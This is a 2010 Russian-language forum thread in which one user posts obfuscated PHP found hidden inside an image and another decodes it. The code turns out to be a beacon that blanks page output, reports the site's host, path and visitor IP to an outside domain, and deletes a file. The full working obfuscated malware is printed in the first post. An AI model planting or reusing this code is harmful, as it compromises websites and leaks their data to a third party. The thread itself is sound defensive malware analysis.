Помогите расшифровать вредоносный код

Тема в разделе ".:: Уязвимости", создана пользователем Demon425, 25 окт 2010.

Статус темы:
Закрыта.
  1. Demon425

    Demon425

    Регистр.:
    9 июл 2008
    Сообщения:
    439
    Симпатии:
    96
    В одной из картинок помимо самой картинки нашёл вот такой шелл

    PHP:
    <? $x13="\x64i\162n\x61m\145"$x14="fil\x65"$x15="\155\153d\x69r"$x16="\165\156\154i\156\153"
    $x0b="\0600\071";$x0c="no"; if($x0c=='ok'){$x15("\x74\145\163t_o\x6b",0777);}echo "\074s\164y\x6c\x65\076\142\x6f\x64\x79\173\146\157\x6e\164\055s\151z\x65:\x30\x70\170\x3bc\x6f\x6co\162:\x23\146ff}\074/\163\164yl\x65\076"$x0d="\150\164\164\160\072\x2f/".$x13($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$x0e=$_SERVER['HTTP_HOST']; $x0f=$_SERVER['REMOTE_ADDR']; $x10 = array('127.0.0.1'); foreach ($x10 as $x11) { if($x11==$x0f) {}else{if($_SERVER['HTTP_HOST']==$x0f){}else{$x12 = @$x14("htt\160\x3a\057\057styk\141c\150\x2ew\163/c\157k\x5fma\x69\156\056\160\x68p?\147u\075$x0e\046\165s\145\162=$x0b\046\x69\x70=$x0f\x26f=$x0d"); $x16('rss_taib.png'); }}}?>
    <? echo "\x3c\x73\164\x79\x6ce\x3e\142\157\x64y\173\146o\x6e\x74\x2d\163\x69\172\145\072\x30\160\x78\x3bc\x6fl\157\x72\x3a\x23\x66\x66\146\175</\163t\x79\x6c\145>";?>
    Помогите расшифровать...
     
  2. jo0o00nyy

    jo0o00nyy Постоялец

    Регистр.:
    12 май 2010
    Сообщения:
    65
    Симпатии:
    27
    Код:
    x13 = dirname
    x14 = file
    x15 = mkdir
    x16 = unlink
    x0b = 009
    x0c = no
    
    в общем это "стучалка". Что бы скрыть различные эрроры и сообщения выводится
    Код:
    <style>body{font-size:0px;color:#fff}</style>
    а потом скрипт стучится на урл
    Код:
    http://stykach.ws/cok_main.php?gu=localhost&user=009&ip=127.0.0.1&f=http://localhost/
    где домен и ИП беруться ваши, и причем если запущен скрипт на локалхосте, то запрос не происходит. После "стучалки" удаляется файл "rss_taib.png"
     
Статус темы:
Закрыта.